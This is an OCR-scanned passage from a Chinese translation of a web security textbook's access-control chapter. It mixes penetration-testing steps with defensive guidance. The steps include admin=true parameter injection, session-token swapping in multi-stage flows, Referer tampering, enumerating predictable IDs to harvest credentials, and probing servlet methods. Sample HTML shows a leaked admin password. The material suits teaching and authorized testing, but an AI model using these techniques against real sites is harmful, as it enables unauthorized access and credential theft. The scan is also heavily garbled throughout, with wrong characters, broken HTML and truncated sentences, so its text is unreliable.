程序 功能 的 意义 及 用 法 。 例 如 ， 图 8-1 显 示 了 在 用 户 查 看 主页 时 返回 给 
每 名 用 户 的 啊 应 。 其 中 的 两 个 啊 应 显示 了 针对 登录 用 户 的 不 同 说 明 ， 
而 有 旦 管理 用 户 拥 有 一 个 额外 的 菜单 项 。 这 些 差 异 是 预期 行为 ， 它 们 与 
应 用 程序 访问 控制 的 效率 无 关 ， 因 为 它们 只 与 用 户 界面 有 天 。 

用 户 请 求 顶 级 管理 页 面 时 返回 的 啊 应 如 图 8-2 所 示 。 其 中 显示 ， 管 
理 用 户 可 以 看 到 一 个 包含 可 用 选项 的 某 单 ， 而 普通 用 户 则 看 到 “未 授 
权 ” (not authorized) 消息 。 这 些 差异 表明 ， 访 问 控制 已 得 到 正确 应 
用 。 用 户 请 求 “ 列 举 用 户 ” (list users) 管理 功能 时 返回 的 响应 如 图 8-3 
所 示 。 其 中 显示 的 两 个 啊 应 完全 相同 ， 这 表示 应 用 程序 易于 受到 攻 
击 ， 因 为 普通 用 户 不 应 拥有 访问 此 功能 的 权限 ， 而 且 该 用 户 的 用 户 界 
面 中 也 没有 任何 指 同 该 功能 的 链接 。 


F><hr><a 
Arete "Howe . asbx"> Home </ a> 
r> </body> </html> 


coy RGR ERE acces: syne selecton 


仅仅 通过 分 析 站 点 地 图 树 及 查看 项 目 之 间 的 差异 数量 ， 并 不 足以 
评估 应 用 程序 访问 控制 的 效率 。 出 现 两 个 完全 相同 的 响应 可 能 表示 存 
在 漏洞 (例如 ， 在 披露 敏感 信息 的 管理 功能 中 ) ， 也 可 能 不 会 导致 任 
何 危 险 (例如 ， 在 不 受 保护 的 搜索 功能 中 ) 。 相 反 ， 两 个 不 同 的 响应 
也 有 可 能 表示 存在 漏洞 例如， 在 每 次 访问 都 返回 不 同 内 容 的 管理 功 
能 中 ) ， 也 可 能 不 会 导致 任何 危险 (例如 ， 在 显示 当前 登录 用 户 的 用 
户 信 息 的 页 面 中 ) 。 基 于 上 述 原 因 ， 在 确定 访问 控制 漏洞 方面 ， 完 全 
自动 化 的 工具 往往 效率 低下 。 使 用 Burp 的 “站 点 地 图 比较 ”功能 ， 可 以 
尽 可 能 自动 完成 确定 漏洞 的 过 程 ， 以 现成 的 格式 获得 所 需 的 全 部 信 
轧 ， 同 时 应 用 目 己 在 应 用 程序 功能 方面 的 知识 来 确定 任何 具体 的 调 
ii] ° 


尝试 访问 


http://mdsec.net/auth/462/ 
http://mdsec.net/auth/468/ 


8.2.2 ”测试 过 程 


上 一 市 介绍 的 方法 一 一 比较 通过 不 同 用 户 账 户 访问 的 应 用 程序 内 
容 一 一 无 法 用 于 测试 某 些 多 阶段 过 程 。 在 多 阶段 过 程 中 ， 要 执行 某 个 
操作 ， 用 户 通 昔 需要 以 正确 的 顺序 提出 多 个 请 求 ， 应 用 程序 则 在 用 户 
提出 请 求 的 同时 创建 有 关 用 户 操作 的 状态 。 仅 仅 重 新 请 求 站 点 地 图 中 
的 每 一 个 项 目 ， 并 不 能 正确 重复 相关 过 程 ， 因 此 ， 由 于 访问 控制 以 外 
的 其 他 原因 ， 你 竹 试 的 操作 可 能 会 失败 。 

以 添加 新 应 用 程序 用 户 的 管理 功能 为 例 。 该 功能 可 能 涉及 几 个 步 
骤 ， 包 括 加 载 用 于 添加 用 户 的 表单 、 提 区 包 侣 者 用 户 详细 资料 的 表 
单 、 审 查 用 户 详细 资料 ， 以 及 确认 添加 操作 。 某 些 情况 下 ， 应 用 程序 
可 能 为 会 初始 表单 提供 保护 ， 但 没有 为 处 理 表单 提交 的 页 面 或 确认 页 
面 提供 保护 。 整 个 过 程 可 能 包含 大 量 请 求 (AREEN) ， 在 以 前 阶 
段 提交 的 参数 将 在 以 后 通过 客户 端 重新 传送 。 因 此 ， 这 个 过 程 的 每 一 
个 步骤 都 需要 单独 进行 测试 ， 以 确认 访问 控制 是 否 得 到 正确 应 用 。 


尝试 访问 


http://mdsec.net/auth/471/ 


渗透 测试 步骤 


(1) 在 以 多 步骤 方式 执行 某 个 操作 ， 需 要 从 客户 端 向 服务 器 
提交 几 个 不 同 的 请 求 时 ， 应 单独 测试 每 一 个 请 求 ， 以 确定 是 否 已 对 
这 些 请 求 应 用 了 访问 控制 。 应 确 你 测试 每 一 个 请 求 ， 包 括 表 单 所 
交 、 重 定 同 ， 以 及 任何 非 参数 化 的 请 求 。 

(2) 尝试 发 现 应 用 程序 确定 你 是 否 到 达 特 定 阶段 (必须 通过 
合法 的 途径 到 达 该 阶段 ， 的 任何 位 置 。 演 斌 使 用 权限 较 低 的 账户 到 
达 该 阶段 ， 检 测 是 否 可 以 实施 任何 权限 提升 攻击 。 

(3) 手动 执行 这 种 测试 的 一 种 方法 ， 是 在 浏览 器 中 多 次 完成 
受 保护 的 多 阶段 过 程 ， 并 使 用 代理 服务 器 将 在 不 同 请 求 中 提供 的 会 
话 令 牌 切换 为 权限 较 低 的 用 户 的 令 牌 。 

(4) 通过 使 用 Burp Suite 的 “浏览 器 中 的 请 求 ” (request in 
browser) 功能 ， 可 以 显著 加 快 这 个 过 程 。 

(a) 使 用 权限 较 高 的 账户 遍历 整个 多 阶段 过 程 。 

; ay 使 用 权限 较 低 的 账户 (或 根本 不 使 用 账户 ) 登录 应 

用 程序 。 

(c) 在 Burp Proxy 的 历史 记录 中 ， 找到 权限 较 高 的 用 户 执 
行 多 步骤 过 程 时 提出 的 请 求 序 列 。 对 于 序列 中 的 每 个 请 求 ， 选 
择 “ 当 前 浏览 器 会 话 在 浏览 器 中 的 请 求 ”(request in browser in 
current browser session) 上 下 文 菜 单项 (如 图 8-4 所 示 ) 。 将 提 
供 的 URL 烙 贴 到 以 权限 较 低 的 用 户 叶 份 登录 的 浏 斋 器 中 。 
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图 8-4 ”使 用 Burp 在 当前 浏览 器 会 话 中 请 求 给 定 项 


(d) 如 果 应 用 程序 允许 ， 则 使 用 浏览 器 以 正常 方式 完成 
剩 下 的 多 阶段 过 程 。 


(e) 查看 浏览 器 和 代理 服务 器 历史 记录 中 的 结果 ， 确 定 
征 否 可 以 成 功 执 行 特权 操作 。 


当 你 对 指定 的 请 求 选 择 Burp 的 “当前 浏览 器 会 话 在 浏览 器 中 的 请 
求 ” 功 能 时 ，Burp 会 辣 你 提供 一 个 指定 Burp 的 内 部 Web 服 务 絮 的 唯一 
URL， 然 后 ， 将 这 个 URL 靖 贴 到 浏览 絮 的 地 址 栏 中 。 当 你 在 浏览 絮 中 
请 求 这 个 URL 时 ，Burp 将 返回 一 个 指 癌 最初 指定 的 URL 的 重 定 同 。 浏 
哆 絮 访 问 该 重 定 同 时 ，Burp 将 用 最 初 指定 的 请 求 蔡 换 该 请 求 ， 同 时 保 
持 Cookie 消 息 头 不 变 。 如 果 正 测试 不 同 的 用 户 账 户 ， 可 以 加 快 这 个 过 
程 。 以 不 同 用 户 登 录 几 个 不 同 的 浏览 妖 ， 并 将 上 述 UREL 粘 贴 到 每 个 浏 
览 右 中 ， 看 应 用 程序 如 何 处 理 使 用 不 同 浏览 器 登 孙 的 用 户 的 请 求 。 

(需要 注意 的 是 ， 由 于 同一 浏览 器 通常 会 在 不 同窗 口 之 间 共 享 
cookie， 因 此 ， 在 执行 这 个 测试 时 ， 需 要 使 用 不 同 的 浏览 邵 产 品 ， 或 
安装 在 不 同 机 器 上 的 浏览 器 。) 


¥ 提示 ”以 不 同 的 用 户 账户 测试 多 阶段 过 程 时 ， 检 查 不 同 用 
户 逐 个 提出 的 请 求 的 序列 有 助 于 确定 有 利于 进一步 调查 的 细微 差 
= 


O° 
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Burp 中 创建 供 每 个 浏览 器 使 用 的 不 同 代理 监听 器 (需要 在 每 个 浏览 
絮 中 更 新 代理 服务 紫 配 置 ， 以 指 各 相关 监听 器 ) 。 然 后 ， 对 于 每 个 
浏览 右 ， 使 用 代理 服务 如 历史 记录 中 的 上 下 文 菜单 打开 新 的 历史 记 
a a 


进行 测试 


如 果 只 有 一 个 用 户 级 账户 可 用 于 访问 应 用 程序 (或 根本 没有 任何 
账户 ) ， 这 时 ， 要 测试 访问 控制 的 效率 ， 还 需要 完成 其 他 工作 。 实 际 
上 ,无论 在 什么 情况 下 ， 要 想 执 行 全 面 彻底 的 测试 ， 痢 需要 完成 其 他 
工作 。 在 应 用 程序 中 ， 可 能 存在 一 些 未 受到 产 格 保护 的 功能 ， 而 且 任 
何 用 户 界 面 均 未 明确 提供 这 些 功能 的 链接 。 例 如 ， 可 能 有 一 些 旧 功能 
尚未 删除 ， 或 者 新 功能 已 部 团 但 未 同 用 户 公 布 。 


渗透 测试 步骤 


(1) 使 用 第 4 章 介 绍 的 内 容 查找 技巧 确定 尽 可 能 多 的 应 用 程序 


(2) 如 果 确 定 可 能 向 普通 和 管理 用 户 提供 不 同 功能 或 链接 的 
应 用 程序 页 面 例如,“ 控制 面板 ”或 “我 的 主页 ”) ， 演 试 在 URL 查 
询 字 符 品 和 POST 请 求 主体 中 插入 admin=true 之 类 的 参数 ， 确 定 这 样 
ee 问 任 何其 他 你 所 拥有 的 用 户 权 限 正 常 无 法 访问 的 
功能 。 

(3) 测试 应 用 程序 是 否 基 于 Referer 消 息 头 做 出 访问 控制 决 
策 。 对 于 获得 授权 访问 的 关键 应 用 程序 功能 ， 尝 试 删除 或 修改 
Referer 消 息 尖 并 确定 是 否 仍然 能 够 成 功 提出 请 求 。 如 果 不 能 ， 应 用 
程序 可 能 以 某 种 不 安全 的 方式 信任 Referer 消 轧 涉 。 如 果 使 用 Burp 的 
主动 扫描 妖 扫 摘 请 求 ，Burp 会 笑 试 删除 每 个 请 求 的 Referer 消 息 尖 ， 
并 通知 你 这 样 做 是 否 会 在 应 用 程序 的 响应 中 造成 对 应 的 相关 差异 。 

(4) 检查 所 有 客户 端 HTML 与 脚本 ， 查 找 隐藏 功能 或 可 从 客户 
端 进行 操纵 的 功能 的 引用 ， 如 基于 脚本 的 用 户 界 面 。 同 时 ， 反 编译 
第 5 章 中 介绍 的 所 有 浏 虎 器 扩展 组 件 ， 查 找 任何 服务 器 端 功 能 的 引 
用 o 


尝试 访问 
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一 旦 枚 举 出 所 有 可 访问 的 功能 ， 束 有 必要 测试 应 用 程序 是 否 正 确 
划分 每 名 用 户 访问 资源 的 权限 。 如 果 应 用 程序 允许 用 户 访问 一 组 内 容 
广泛 的 相同 类 型 的 资源 (如 文档 、 订 单 、 电 子 邮件 和 个 人 资料 ) ， 则 
用 户 就 有 机 会 未 授权 访问 其 他 资源 。 


渗透 测试 步骤 


(1) 无 论 应 用 程序 使 用 何 种 标识 符 (文档 ID、 账 号 、 订 单 引 


等 ) 指定 用 户 所 请 求 的 资源 ， 应 演 试 找到 没有 权限 访问 的 资源 的 
IRIT ° 

(2) 如 果 有 可 能 生成 一 系列 紧密 相连 的 标识 符 (例如 ， 通 过 
创建 几 个 新 文档 或 订单 ) ， 则 可 以 使 用 我 们 在 第 7 章 描述 的 针对 会 
Se 尝试 在 应 用 程序 生成 的 标识 符 中 查找 任何 可 预测 的 
Fil ° 

(3) 如 果 无 法 生成 任何 新 标识 符 ， 那 么 只 能 通过 分 析 已 经 发 
现 的 标识 符 ， 或 纯粹 使 用 猜测 方法 得 找 标识 符 。 如 果 标 识 符 为 
GUID 形 式 ， 则 基于 猜测 的 竹 试 将 无 法 取得 成 功 。 但 是 ， 如 采 标 识 
符 是 一 个 相对 较 小 的 数字 ， 则 可 以 竹 试 使 用 与 它 相 差 不 大 的 男 一 个 
数字 ， 或 数字 位 相同 的 另 一 个 随机 数字 。 

(4) 如 有 果 发 现 访问 控制 并 不 完善 ， 而 且 资源 标识 符 可 以 预 
测 ， 可 以 发 动 目 动 攻击 获取 应 用 程序 的 敏感 资源 和 信息 。 可 以 使 用 
在 第 14 章 描述 的 技巧 ， 设 计 一 次 定制 目 动 攻击 ， 以 获取 所 需 的 数 


据 。 

如 于 “ 账 户 信息 ?页面 在 显示 用 户 个 人 资料 的 同时 还 显示 他 的 用 
户 名 和 和 密码， 则 这 种 漏洞 可 能 会 造成 灾难 性 的 后 果 。 虽 然 输 入 的 密 
码 在 屏幕 上 隐藏 显示 ， 但 它 仍然 以 明文 形式 传送 至 浏览 磊 。 因 此 ， 
通常 可 以 快速 过 历 账户 标识 符 的 所 有 可 能 值 范围 ， 从 而 获得 所 有 用 
户 ， 包 括 管理 员 的 登录 证 书 。 图 8-5 说 明了 如 何 使 用 Burp Intruder 成 
功 执行 这 种 攻击 。 
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bordercolor="S0D0000" celispacing®"0" cellpadding="O"width="100%" 
style="border-collapse: collapse"><tr><td></td></te></table><br/> 


<table border="0"><ctr><ctd>Mame: 
</cd><td>Administrator</td></trc><tc><td>Vsername: 
</td><td>admin</td></tr><tr><td>Password: </td><cd>pwnedk/td></tr><tr><ta>uid: 
</td><td>79</td></tr><tr><td>Role: 
</td><cd>Administrator</td></tr></table><br><a 

href "Home. ashx">Home</ a><br></body></btml> 


尝试 访问 
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YY 提示 ”如果 检测 到 访问 控制 漏洞 ， 可 以 立即 发 动 一 次 攻 
击 ， 竹 试 通过 攻破 一 个 具有 管理 权限 的 用 户 账 户 来 进一步 提升 目 己 
的 权限 。 可 以 通过 各 种 技巧 查找 管理 账户 。 利 用 上 面 介绍 的 访问 控 
制 缺 陷 ， 可 以 获得 数 百 个 用 户 证 书 ， 并 笑 试 手动 登录 每 一 个 账户 ， 
直到 找到 管理 员 账 户 。 但 是 ， 如 采 账 户 以 连续 的 数字 ID 为 标识 符 ， 
则 应 用 程序 通常 会 将 最 小 的 数字 账户 分 配给 管理 员 。 登 录 儿 个 最 先 
注册 的 用 户 ， 往 往 就 可 以 确定 应 用 程序 管理 员 账 户 。 如 末 这 种 方法 
不 可 行 ， 一 种 有 效 的 方法 是 在 应 用 程序 中 查找 其 访问 权限 被 水 平 隔 
离 的 功能 一 一 例如 ， 向 每 名 用 户 呈 现 的 主页 。 编 写 一 段 脚本 ， 使 用 
截获 的 每 个 证 书 登 录 ， 然 后 莹 试 访问 目 己 的 主页 。 很 可 能 管理 用 户 
能 够 查看 每 一 名 用 户 的 主页 ， 因 此 ， 如 采用 于 登 孙 的 征管 理 账户 ， 
你 立即 就 会 发 觉 。 


8.2.4 ”测试 “直接 访问 方法 ” 


如 果 应 用 程序 使 用 直接 访问 服务 絮 端 API 方法 的 请 求 ， 正 常情 况 
下 ， 使 用 上 述 技 巧 即 可 以 确定 这 些 方法 中 的 任何 访问 控制 漏洞 。 但 
是 ， 还 应 该 进行 测试 ， 以 确定 是 否 存在 其 他 可 能 未 受到 正确 保护 的 
API ° 

以 使 用 下 列 请 求 调用 的 servlet 为 例 : 


POST /svc HTTP/1.1 
Accept-Encoding: gzip, deflate 
Eost: wahh-app 

Content-Length: 37 


servlet=com.ibm.ws.webcontainer.httpsession. IBMTrackerDebug 


由 于 这 是 一 个 众所周知 的 servlet， 攻 击 者 可 能 能 够 访问 其 他 servlet 以 执 
行 未 授权 操作 。 


渗透 测试 步骤 


(1) 确定 任何 遵循 Java 命 名 约定 (例如 get、set、add、 
update、is 或 has 后 接 大 写 单词 ) 或 明确 指定 包 结构 (如 
com.companyname.xxx.yyy.ClassName) 的 参数 。 记 下 所 有 你 能 够 发 
现 的 被 引用 的 方法 。 

(2) 找到 某 个 列举 可 用 接口 或 方法 的 方法 。 在 代理 服务 硕 历 
史记 录 中 进行 搜索 ， 看 应 用 程序 的 正常 通信 和 是否 调 用 了 该 方法 。 如 


果 该 方法 未 被 调用 ， 则 尝试 使 用 观察 到 的 命名 约定 猜测 该 方法 。 

(3) 在 公共 资源 (如 搜索 引擎 和 论坛 站 点 ) 中 查找 ， 以 确定 
任何 其 他 可 以 访问 的 方法 。 

(4) 使 用 第 4 章 介绍 的 技巧 猜测 其 他 方法 名 称 。 

(5) 芝 试 使 用 各 种 用 户 账户 (包括 未 授权 访问 ) 访问 收集 到 
的 所 有 方法 。 

(6) 如 果 不 知 道 某 些 方法 需要 的 参数 的 数量 或 类 型 ， 可 以 寻 
找 那 些 不 大 可 能 使 用 参数 的 方法 ， 如 1listInterfaces 和 
getAllUsersInRoles ° 


8.2.5 ”测试 对 静态 资源 的 控制 


如 果 受 应 用 程序 你 护 的 静态 资源 最 终 可 以 通过 指向 资源 文件 本 号 
的 URL 直 接 访 问 ， 这 时 你 应 该 进行 测试 ， 以 确定 未 授权 用 户 是 否 可 以 
直接 请 求 这 些 URL ° 


渗透 测试 步骤 


(1) 遍历 访问 受 保护 静态 资源 的 正常 过 程 ， 获 取 用 于 最 终 访 
问 该 资源 的 URL 示 例 。 


(2) 使 用 不 同 的 用 户 账户 (如 权限 较 低 的 用 户 或 没有 购买 所 
需 商 品 的 账户 ) ， 壬 试 使 用 已 确定 的 URL 直 接 访 问 该 货源 。 

(3) 如 果 这 种 攻击 取得 成 功 ， 壬 试 了 解 受 保护 的 静态 资源 所 
使 用 的 命名 方案 。 如 果 可 能 ， 设 计 一 个 自动 攻击 ， 获 取 可 能 有 用 或 
可 能 包含 敏感 数据 的 内 容 (请 参阅 第 14 章 ) o 


8.2.6 ”测试 对 HTTP 方 法 实施 的 限制 


虽然 并 没有 现成 的 方法 可 用 于 检测 应 用 程序 的 访问 控制 是 否 对 
e A a ee 
EPY] ° 


渗透 测试 步骤 


(1) 使 用 一 个 权限 较 高 的 账户 ， 确 定 一 些 执行 敏感 操作 的 特 
权 请 求 ， 如 添加 新 用 户 或 更 改 用 户 的 安全 角色 的 请 求 。 

(2) 如 果 这 些 请 求 未 受到 任何 反 CSRF 令 牌 或 类 似 功 能 (请 参 
阅 第 13 章 ) 的 保护 ， 可 以 使 用 权限 较 高 的 账户 确定 ， 如 果 HTTP 方 
法 被 修改 ， 应 用 程序 是 否 仍然 执行 请 求 的 操作 。 应 测试 的 HTTP 方 


法 包括 : 

g POST; 

J GET; 

g HEAD; 

口 任 何 无 效 的 HTTP 方 法 。 

(3) 如 果 应 用 程序 执行 任何 使 用 与 最 初 的 方法 不 同 的 HTTP 方 

法 的 请 求 ， 则 应 使 用 上 述 标准 技巧 ， 通 过 权限 较 低 的 账户 对 针对 这 
些 请 求实 施 的 访问 控制 进行 测试 。 


8.3 ills 安全 


访问 控制 是 最 容易 理解 的 Web 应 用 程序 安全 领域 ， 但 是 在 执行 它 
们 时 必须 采用 合理 、 全 面 的 方法 。 

首先 应 避免 几 种 明显 的 缺陷 。 出 现 这 些 缺 聊 ， 通 常 是 由 于 我 们 不 
了 解 执 行 有 效 访问 控制 应 满足 的 基本 要 求 ， 或 者 对 用 户 应 提出 哪些 请 
求 ， 以 及 应 用 程序 需要 防御 哪些 威胁 存在 错误 的 认识 。 

口 不 要 认为 用 户 不 知道 用 于 指定 应 用 程序 资源 的 URL 或 标识 符 
(如 账号 和 文档 ID) 就 无 法 访问 这 些 资源 。 假 设 用 户 知 道 每 一 个 应 用 
程序 的 URL 和 标识 符 ， 确 保 应 用 程序 的 访问 控制 足以 防止 未 授权 访 
[A] 。 

口 不 要 信任 任何 用 户 提 交 的 表示 访问 权限 的 参数 (如 
admin=true) 。 

口 不 要 认为 用 户 将 按 设 定 的 顺序 访问 应 用 程序 页 面 。 不 要 认为 因 
为 用 户 无 法 访问 “编辑 用 户 ” 页 面 ， 他 们 融 不 能 到 达 由 该 页 面 链 接 的 “ 编 
辑 用 户 X" 页 面 。 

口 不 要 相信 用 户 不 会 自 改 通过 客户 端 传送 的 数据 。 如 采用 户 提交 
D a a 
以 下 是 一 些 在 Web 应 用 程序 中 执行 有 效 访问 控制 的 最 佳 方法 。 

口 仔细 评估 并 记录 每 个 应 用 程序 功能 单元 的 访问 控制 要 求 。 这 包 
括 谁 能 合法 使 用 这 些 功能 ， 以 及 用 户 通 过 这 些 功能 能 够 访问 哪些 资 


源 。 

口 通过 用 户 会 话 做 出 所 有 访问 控制 决定 。 
口 使 用 一 个 中 央 应 用 程序 组 件 检 查访 问 控制 。 
口 通过 这 个 组 件 处 理 每 一 个 客户 端 请 求 ， 确 认 人 允许 提出 请 求 的 用 
户 访问 他 请 求 的 功能 和 资源 。 

口 使 用 编程 技巧 确保 前 面 的 方法 没有 例外 。 一 种 有 效 的 方法 是 规 
定 每 个 应 用 程序 页 面 必 须 采 用 一 个 由 中 央 访 问 控制 机 制 查询 的 界面 。 
oo San 
\ 码 。 

口 对 于 特别 敏感 的 功能 ， 例 如 管理 页 面 ， 可 以 通过 IP 地 址 进一步 
限制 访问 ， 确 保 只 有 特殊 网 络 范 围 内 的 用 户 能 够 访问 这 些 功 能 ， 不 管 
他 们 是 否 登 录 。 


< 
ot 


口 如 来 静 仿 内 容 需 要 得 到 保护 ， 有 两 种 方法 可 提供 访问 控制 。 首 
先 ， 用 户 可 通过 向 执行 相关 访问 控制 逻辑 的 服务 器 问 动态 页 面 传送 一 
个 文件 名 ， 间 接 访问 议 态 文件 。 其 次 ， 可 通过 使 用 HTTP 验 证 或 应 用 程 
序 服务 器 的 其 他 特性 隐藏 进入 的 请 求 ， 并 在 允许 访问 前 检查 资源 许 
可 ， 欣 制 用 户 直接 访问 静态 文件 。 

口 无 论 何 时 通过 客户 端 传送 ， 指 定 用 户 所 希望 访问 资源 的 标识 符 
都 容易 遭 到 算 改 。 服 务 器 应 只 信任 完整 的 服务 器 问 数 据 。 任 何 时 候 通 
过 客户 端 传送 这 些 标识 符 ， 都 需要 对 它们 进行 重新 确认 ， 以 确保 用 户 
拥有 访问 被 请 求 闹 源 的 授权 。 

口 对 于 安全 性 很 关键 的 应 用 程序 功能 (如 在 银行 应 用 程序 中 创建 
一 个 新 的 汇款 收 款 人 ) 考虑 对 每 笔 交 易 执 行 重复 验证 和 双重 授权 ， 进 
一 步 确 保 该 功能 不 会 被 未 授权 方 使 用 。 这 样 做 还 可 以 减轻 其 他 可 能 的 
攻击 (如 会 话 支持 ) 造成 的 后 果 。 

口 记录 每 一 个 访问 敏感 数据 或 执行 敏感 操作 的 事件 。 这 些 记录 有 
助 于 检测 并 调查 潜在 的 访问 控制 违反 事件 。 

Web 应 用 程序 开发 者 通常 逐步 执行 访问 控制 功能 ， 在 他 们 发 现 需 
要 访问 控制 的 每 个 页 面 插入 代码 ， 并 在 不 同 的 页 面 间 豌 切 和 粳 贴 相同 
的 代码 以 满足 类 似 的 需求 。 这 种 方法 会 在 建立 的 访问 控制 机 制 中 引入 
内 在 的 缺陷 ， 许 多 需要 访问 控制 的 情况 被 名 上 略 ， 为 一 个 区 域 设计 的 控 
制 可 能 并 不 适用 于 男 一 个 区 域 ， 在 应 用 程序 其 他 地 方 所 做 的 修改 可 能 
会 由 于 违反 开发 者 做 出 的 假设 而 与 现 有 控制 机 制 相互 冲突 。 

与 这 种 方法 相 比 ， 前 面 描述 的 使 用 中 央 应 用 程序 组 件 实施 访问 控 
制 的 方法 具有 诸多 优点 。 

口 它 可 增进 应 用 程序 访问 控制 的 透明 度 ， 使 得 不 同 开发 者 能 够 迅 
速 理解 其 他 人 执行 的 控制 机 制 。 

口 它 可 提高 访问 控制 的 可 维护 性 。 许 多 变更 只 需要 在 一 个 共 孚 的 
组 件 中 应 用 一 次 即 可 ， 不 需要 将 代码 瘟 切 并 精 贴 到 多 个 位 置 。 

口 它 可 改善 可 适应 性 。 如 果 出 现 新 的 访问 控制 要 求 ， 这 些 要 求 可 
立即 反映 到 由 每 个 应 用 程序 页 面 执行 的 一 个 现 有 API 中 。 
人 
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多 层 权 限 模 型 

与 访问 有 关 的 问题 不 仅 适 用 于 Web 应 用 程序 ， 而 且 也 适用 于 其 中 
的 其 他 基础 设施 ， 特 别 是 应 用 程序 服务 上 器、 数据 库 和 操作 系统 。 采 取 
深层 安全 措施 需要 在 上 述 每 一 个 层面 执行 访问 控制 ， 建 立 儿 层 保护 。 


这 样 做 可 以 强化 对 未 授权 访问 威胁 的 防御 ， 因 为 即使 攻击 者 攻破 一 个 
层面 的 防御 ， 也 会 被 其 他 层面 的 防御 机 制 阻 上 上 。 

除 上 文 所 述 的 在 Web 应 用 程序 中 执行 有 效 的 访问 控制 外 ， 还 可 以 
Be oe eee eieciige n yc 
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口 可 根据 在 应 用 程序 服务 器 层面 定义 的 用 户 角 色 ， 使 用 应 用 程序 
服务 器 对 完整 URL 路 径 实 施 访问 控制 。 

口 当 执行 其 他 用 户 的 操作 时 ， 应 用 程序 可 使 用 一 个 不 同 的 数据 库 


| 
问 控制 。 

口 用 于 运行 基础 设施 中 每 个 组 件 的 操作 系统 账户 只 需 分 配 组 件 实 
际 需要 的 最 低 权 限 。 

复杂 的 安全 性 能 关键 的 应 用 程序 可 通过 一 个 定义 应 用 程序 不 同 用 
尸 角 色 和 不 同 权 限 的 矩阵 来 帮助 实施 这 种 多 层 防御 措施 。 在 每 一 个 层 
H, ee ee o 图 8-6 是 一 个 复杂 应 用 程序 的 
一 部 分 权限 矩阵 。 


应 用 程序 服务 器 应 用 程序 角色 数据 库 权 限 
EE [|] 
站 编 消 浏 政 级 | 浏 创 | 浏 户 , 创 | 浏 委 
FA 
用 户 类 型 URL 路 径 用 户 角 色 H H AI ome Pleja) lH 
E PEPE PE 账 | MER [E 
; 序 序 序 | Aj jP 志 


Site Administrator 


jadmin/* 
/myQuotes/* 
fhelp/* 


/myQuotes/* 
(helpi* 


ustomer ~ Support 
imyQuotesdiash jsp [User — Applications 
/myQuotes/apply,jsp [User -~ Referrals 
fmyQuetes/search.jsp 
help" 


图 8-6 一 个 复杂 应 用 程序 权限 矩阵 实例 


我 们 可 以 在 这 种 安全 模型 中 应 用 各 种 有 益 的 访问 控制 概念 。 


口 编程 控制 (programmatic control) 。 数 据 库 权 限 和 矩阵 保存 在 一 
个 数据 库 表 中 ， 并 以 编程 的 形式 来 做 出 访问 控制 决定 。 对 用 户 角色 进 
行 分 类 可 以 人 简化 某 些 访问 控制 检查 ， 这 一 任务 同样 可 以 通过 编程 来 完 
成 。 编 程控 制 可 能 极其 琐碎 ， 并 可 能 在 应 用 程序 中 建立 非常 复杂 的 访 
问 控 制 逻 辑 。 

口 自主 访问 控制 (Discretionary Access Control, DAC) 。 使 用 自 
主 访问 控制 ， 管 理 员 可 将 自己 的 权限 分 配给 其 他 与 拥有 特殊 资源 有 关 
的 用 户 。 在 封闭 型 DAC 模 型 中 ， 除 非 明 确 许 可 ， 否 则 拒绝 访问 。 管 理 
员 还 可 以 锁定 或 终止 某 个 用 户 账户 。 在 开放 型 DAC 模 型 中 ， 除 非 明 确 
废除 许可 ， 否 则 允许 访问 。 各 种 应 用 程序 用 户 有 权 创 建 用 户 账 户 ， 并 
再 次 应 用 目 主 访问 控制 。 

口 基 于 角色 的 访问 控制 (Role-Based Access Control, RBAC) 。 
这 种 控制 使 用 许多 命名 的 角色 ， 每 个 角色 拥有 各 不 相同 的 特殊 权限 ; 
每 个 用 户 分 配 有 一 个 这 样 的 角色 。 这 样 做 可 简化 不 同 权 限 的 分 配 与 实 
施 ， 并 有 助 于 管理 复杂 应 用 程序 中 的 访问 控制 。 使 用 角色 对 用 户 请 求 
执行 “前 沿 ” 访 问 检 查 有 助 于 实行 最 少量 的 处 理 迅 速 拒 绝 许多 未 授权 的 
as o 对 特殊 用 户 可 访问 的 URL 路 径 加 以 保护 就 是 这 种 方法 的 一 个 典 
型 应 用 。 

当 设 计 基 于 角色 的 访问 控制 机 制 时 ， 我 们 有 必要 限制 角色 的 数 

量 ， 以 对 应 用 程序 的 权限 进行 有 殖 管 理 。 如 果 建 立 太 多 琐碎 的 角 

色 ， 那 么 由 于 不 同 角色 的 数目 党 多 ， 可 能 就 很 难 对 其 进行 有 效 管 

理 。 如 果 建 立 太 少 的 角色 ， 这 些 角色 就 只 能 对 访问 进行 粗略 管 

理 ， 个 体 用 户 分 配 到 的 权限 将 不 足以 履行 他 们 的 职能 。 

如 果 使 用 平台 级 控制 、 基 于 HTTP 方 法 和 URL 限 制 对 不 同 应 用 程序 

角色 的 访问 ， 则 应 将 这 些 控制 设计 为 使 用 默认 拒绝 模式 ， 因 为 这 

是 防火 墙 规 则 的 最 佳 做 法 。 这 其 中 应 包括 各 种 特定 规则 ， 用 于 将 

某 些 HTTP 方 法 和 URL 分 配给 特定 角色 ， 而 且 ， 随 后 的 规则 应 拒绝 

不 符合 前 一 规则 的 任何 请 求 。 

口 声明 式 控 制 (declarative control) 。 应 用 程序 使 用 有 限 的 数据 库 
账户 访问 数据 库 。 它 对 不 同 的 用 户 群 体 使 用 不 同 的 账户 ， 每 个 账户 分 
配 到 执行 该 群体 所 允许 执行 的 操作 所 必需 的 最 低 权 限 。 这 种 声明 式 控 
制 从 应 用 程序 以 外 进行 声明 。 这 是 深层 防御 原理 的 一 个 非常 有 用 的 应 
用 ， 因 为 权限 是 由 另外 一 个 组 件 赋予 应 用 程序 的 。 这 样 ， 即 使 一 名 用 
户 突 破 在 应 用 程序 层面 执行 的 访问 控制 ， 企 图 实施 添加 新 用 户 之 类 的 
敏感 操作 ， 他 仍然 会 被 阻止 ， 因 为 他 使 用 的 数据 库 账 户 并 未 在 数据 库 
内 获得 必要 的 权限 。 


另 一 种 情况 是 在 配置 应 用 程序 的 过 程 中 ， 通 过 配置 描述 符 文件 
(descriptor file) 在 应 用 程序 服务 器 层面 上 应 用 声明 式 访问 控 

制 。 但 是 ， 这 种 应 用 一 般 相 对 简单 ， 并 且 无 法 进行 扩展 ， 所 以 无 

法 管理 大 型 应 用 程序 中 种 类 繁多 的 权限 。 


渗透 测试 步骤 


如 采 攻 击 一 个 采用 这 种 多 层 权 限 模型 的 应 用 程序 ， 可 能 这 个 应 
用 程序 能 够 防御 在 应 用 访问 控制 过 程 中 第 犯 的 许多 明显 错误 。 由 于 
在 其 他 层面 实施 的 保护 措施 ， 避 开 应 用 程序 的 访问 控制 可 能 无 法 取 
